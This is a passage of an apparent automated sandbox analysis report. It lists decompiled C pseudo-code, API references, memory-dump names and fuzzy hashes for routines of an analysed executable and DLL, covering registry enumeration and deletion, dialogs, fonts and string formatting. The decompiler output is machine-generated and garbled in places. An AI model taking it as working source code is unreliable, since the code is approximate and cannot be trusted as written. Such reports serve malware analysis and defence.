					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                0x00402a79
                0x00402a8a
                0x00402a92
                0x00402aba
                0x00402aa1
                0x00402aa4
                0x00402af4
                0x00402afa
                0x00402afc
                0x00000000
                0x00402afc
                0x00402ab1
                0x00402ab6
                0x00402ab8
                0x00000000
                0x00000000
                0x00402ab8
                0x00402acf
                0x00402ad7
                0x00402ade
                0x00402b04
                0x00402b0a
                0x00000000
                0x00000000
                0x00402b12
                0x00402b18
                0x00402b1a
                0x00000000
                0x00000000
                0x00000000
                0x00402b1a
                0x00000000
                0x00402aed
                0x00402b01

                APIs
                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Close$DeleteEnumOpen
                • String ID:
                • API String ID: 1912718029-0
                • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                0x00401ce8
                0x00401cef
                0x00401d1e
                0x00401d26
                0x00401d2d
                0x00401d2d
                0x004028c1
                0x004028cd

                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                0x0040464f
                0x00404654
                0x0040465c
                0x0040465d
                0x0040466a
                0x00404672
                0x00404673
                0x00404675
                0x00404677
                0x00404679
                0x0040467c
                0x0040467c
                0x00404683
                0x00404689
                0x00404689
                0x00404690
                0x00404697
                0x0040469a
                0x0040469d
                0x0040469d
                0x004046a1
                0x004046b1
                0x004046b3
                0x004046b6
                0x0040465f
                0x0040465f
                0x00404666
                0x00404666
                0x004046be
                0x004046c9
                0x004046df
                0x004046ef
                0x0040470b

                APIs
                • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                • wsprintfA.USER32 ref: 004046EF
                • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                0x00401bd3
                0x00401bdf
                0x00401be2
                0x00401beb
                0x00401beb
                0x00401bee
                0x00401bf2
                0x00401bfb
                0x00401bfb
                0x00401bfe
                0x00401c02
                0x00401c04
                0x00401c51
                0x00401c53
                0x00401c5c
                0x00401c64
                0x00401c67
                0x00401c67
                0x00401c70
                0x00000000
                0x00401c06
                0x00401c0d
                0x00401c0f
                0x00401c17
                0x00401c1a
                0x00401c42
                0x00401c76
                0x00401c76
                0x00401c1c
                0x00401c2a
                0x00401c32
                0x00401c35
                0x00401c35
                0x00401c1a
                0x00401c79
                0x00401c7c
                0x00401c82
                0x00402866
                0x00402866
                0x004028c1
                0x004028cd

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                • SendMessageA.USER32 ref: 00401C42
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                0x0040568c
                0x004056a3
                0x004056ab
                0x004056ab
                0x004056b3

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004030E8,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405691
                • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004030E8,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 0040569A
                • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040568B
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 2659869361-2382934351
                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF8101F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF8101F(intOrPtr _a8) {
				intOrPtr _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				signed int _t8;
				intOrPtr* _t10;
				signed int _t12;
				intOrPtr* _t14;
				intOrPtr* _t19;
				void* _t22;

				_t3 = _a8;
				if(_t3 != 0) {
					L3:
					_t10 = __imp___adjust_fdiv; // 0x75e56be4
					 *0x6ff86974 =  *_t10;
					if(_t3 != 1) {
						if(_t3 != 0) {
							L15:
							_t4 = 1;
							return _t4;
						}
						_t5 =  *0x6ff8697c; // 0x0
						if(_t5 == 0) {
							goto L15;
						}
						_t12 =  *0x6ff86978; // 0x22b6658
						_t2 = _t12 - 4; // 0x22b6654
						_t19 = _t2;
						while(_t19 >= _t5) {
							_t14 =  *_t19;
							if(_t14 != 0) {
								 *_t14();
								_t5 =  *0x6ff8697c; // 0x0
							}
							_t19 = _t19 - 4;
						}
						free(_t5);
						 *0x6ff8697c =  *0x6ff8697c & 0x00000000;
						goto L15;
					}
					_t7 = malloc(0x80);
					 *0x6ff8697c = _t7;
					if(_t7 != 0) {
						 *_t7 =  *_t7 & 0x00000000;
						_t8 =  *0x6ff8697c; // 0x0
						_push(0x6ff85004);
						_push(0x6ff85000);
						 *0x6ff86978 = _t8;
						L6FF8341C();
						 *0x6ff86970 =  *0x6ff86970 + 1;
						goto L15;
					}
					L5:
					return 0;
				}
				_t22 =  *0x6ff86970 - _t3; // 0x0
				if(_t22 <= 0) {
					goto L5;
				}
				 *0x6ff86970 =  *0x6ff86970 - 1;
				goto L3;
			}













                0x6ff8101f
                0x6ff81025
                0x6ff81035
                0x6ff81035
                0x6ff81040
                0x6ff81046
                0x6ff81089
                0x6ff810c4
                0x6ff810c6
                0x00000000
                0x6ff810c6
                0x6ff8108b
                0x6ff81092
                0x00000000
                0x00000000
                0x6ff81094
                0x6ff8109b
                0x6ff8109b
                0x6ff8109e
                0x6ff810a2
                0x6ff810a6
                0x6ff810a8
                0x6ff810aa
                0x6ff810aa
                0x6ff810af
                0x6ff810af
                0x6ff810b5
                0x6ff810bb
                0x00000000
                0x6ff810c3
                0x6ff8104d
                0x6ff81056
                0x6ff8105b
                0x6ff81061
                0x6ff81064
                0x6ff81069
                0x6ff8106e
                0x6ff81073
                0x6ff81078
                0x6ff8107d
                0x00000000
                0x6ff81084
                0x6ff8105d
                0x00000000
                0x6ff8105d
                0x6ff81027
                0x6ff8102d
                0x00000000
                0x00000000
                0x6ff8102f
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _inittermfreemalloc
                • String ID: kuP~u
                • API String ID: 1678931842-1219983255
                • Opcode ID: df36e0d104707d1ecfc1641f70e80e3cc07d5b22b2c4cc647e47770bba26362d
                • Instruction ID: c7bc85f0e9cc7fd678dcb6b5a636cc773bb653ac8a1cffe10946ec9d67a1aaae
                • Opcode Fuzzy Hash: df36e0d104707d1ecfc1641f70e80e3cc07d5b22b2c4cc647e47770bba26362d
                • Instruction Fuzzy Hash: E411E832636A81CFEB14CF74D954B6537B5BF077A5B10461AE531CB3E0EB22A850CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                0x00401d46
                0x00401d5f
                0x00401d69
                0x00401d6e
                0x00401d79
                0x00401d80
                0x00401d92
                0x00401d98
                0x00401d9d
                0x00401da7
                0x004024eb
                0x00401561
                0x00402866
                0x004028c1
                0x004028cd

                APIs
                • GetDC.USER32(?), ref: 00401D3F
                • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CapsCreateDeviceFontIndirect
                • String ID:
                • API String ID: 3272661963-0
                • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                0x00402bf8
                0x00402c12
                0x00402c18
                0x00402c22
                0x00402c28
                0x00402c2e
                0x00402c3f
                0x00402c48
                0x00000000
                0x00402c4d
                0x00402c54
                0x00402c1a
                0x00402c21
                0x00402c21
                0x00402bfa
                0x00402bfa
                0x00402c01
                0x00402c04
                0x00402c04
                0x00402c0a
                0x00402c11
                0x00402c11

                APIs
                • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                • GetTickCount.KERNEL32 ref: 00402C22
                • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82090, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF82090(intOrPtr* _a4, char* _a8, int* _a12, intOrPtr _a16) {
				short* _v8;
				short* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				short* _t83;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t135;
				void* _t136;

				_v8 = 0xc0000bbb;
				0x6ff80000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t136 = _t135 + 0x14;
				if(_a4 == 0 || _a12 == 0) {
					return 0xc0000bbd;
				}
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if( *_a4 == 0) {
					L6:
					if( *((intOrPtr*)(_a4 + 4)) == 0) {
						L9:
						if( *((intOrPtr*)(_a4 + 8)) == 0) {
							L12:
							if( *((intOrPtr*)(_a4 + 0xc)) == 0) {
								L15:
								if( *((intOrPtr*)(_a4 + 0x14)) == 0) {
									L18:
									_v28 =  *((intOrPtr*)(_a4 + 0x10));
									_v16 = 0;
									_t83 = E6FF81EA0( &_v44, 0,  &_v16, _a16);
									_v8 = _t83;
									if(_v8 == 0x800007d2) {
										0x6ff80000(_v16 << 1);
										_t136 = _t136 + 4;
										_v12 = _t83;
										if(_v12 == 0) {
											_v8 = 0xc0000bbb;
										} else {
											_v8 = E6FF81EA0( &_v44, _v12,  &_v16, _a16);
											if(_v8 == 0) {
												_v20 = WideCharToMultiByte(0, 0, _v12, 0xffffffff, 0, 0, 0, 0);
												if( *_a12 < _v20) {
													_v8 = 0x800007d2;
												} else {
													WideCharToMultiByte(0, 0, _v12, 0xffffffff, _a8,  *_a12, 0, 0);
												}
												 *_a12 = _v20;
											}
											0x6ff80000(_v12);
											_t136 = _t136 + 4;
										}
									}
									L27:
									0x6ff80000(_v44);
									0x6ff80000(_v40);
									0x6ff80000(_v36);
									0x6ff80000(_v32);
									0x6ff80000(_v24);
									return _v8;
								}
								_t95 = E6FF82B80( *((intOrPtr*)(_a4 + 0x14)));
								_t136 = _t136 + 4;
								_v24 = _t95;
								if(_v24 != 0) {
									goto L18;
								}
								goto L27;
							}
							_t97 = E6FF82B80( *((intOrPtr*)(_a4 + 0xc)));
							_t136 = _t136 + 4;
							_v32 = _t97;
							if(_v32 != 0) {
								goto L15;
							}
							goto L27;
						}
						_t99 = E6FF82B80( *((intOrPtr*)(_a4 + 8)));
						_t136 = _t136 + 4;
						_v36 = _t99;
						if(_v36 != 0) {
							goto L12;
						}
						goto L27;
					}
					_t101 = E6FF82B80( *((intOrPtr*)(_a4 + 4)));
					_t136 = _t136 + 4;
					_v40 = _t101;
					if(_v40 != 0) {
						goto L9;
					}
					goto L27;
				}
				_t103 = E6FF82B80( *_a4);
				_t136 = _t136 + 4;
				_v44 = _t103;
				if(_v44 != 0) {
					goto L6;
				}
				goto L27;
			}





















                0x6ff82096
                0x6ff820b2
                0x6ff820b7
                0x6ff820be
                0x00000000
                0x6ff820c6
                0x6ff820d2
                0x6ff820d5
                0x6ff820d8
                0x6ff820db
                0x6ff820de
                0x6ff820e1
                0x6ff820ea
                0x6ff82108
                0x6ff8210f
                0x6ff8212e
                0x6ff82135
                0x6ff82154
                0x6ff8215b
                0x6ff8217a
                0x6ff82181
                0x6ff821a0
                0x6ff821a6
                0x6ff821a9
                0x6ff821be
                0x6ff821c3
                0x6ff821cd
                0x6ff821d9
                0x6ff821de
                0x6ff821e1
                0x6ff821e8
                0x6ff8226e
                0x6ff821ee
                0x6ff82203
                0x6ff8220a
                0x6ff82224
                0x6ff8222f
                0x6ff82251
                0x6ff82231
                0x6ff82249
                0x6ff82249
                0x6ff8225e
                0x6ff8225e
                0x6ff82264
                0x6ff82269
                0x6ff82269
                0x6ff821e8
                0x6ff82275
                0x6ff82279
                0x6ff82285
                0x6ff82291
                0x6ff8229d
                0x6ff822a9
                0x00000000
                0x6ff822b1
                0x6ff8218a
                0x6ff8218f
                0x6ff82192
                0x6ff82199
                0x00000000
                0x00000000
                0x00000000
                0x6ff8219b
                0x6ff82164
                0x6ff82169
                0x6ff8216c
                0x6ff82173
                0x00000000
                0x00000000
                0x00000000
                0x6ff82175
                0x6ff8213e
                0x6ff82143
                0x6ff82146
                0x6ff8214d
                0x00000000
                0x00000000
                0x00000000
                0x6ff8214f
                0x6ff82118
                0x6ff8211d
                0x6ff82120
                0x6ff82127
                0x00000000
                0x00000000
                0x00000000
                0x6ff82129
                0x6ff820f2
                0x6ff820f7
                0x6ff820fa
                0x6ff82101
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
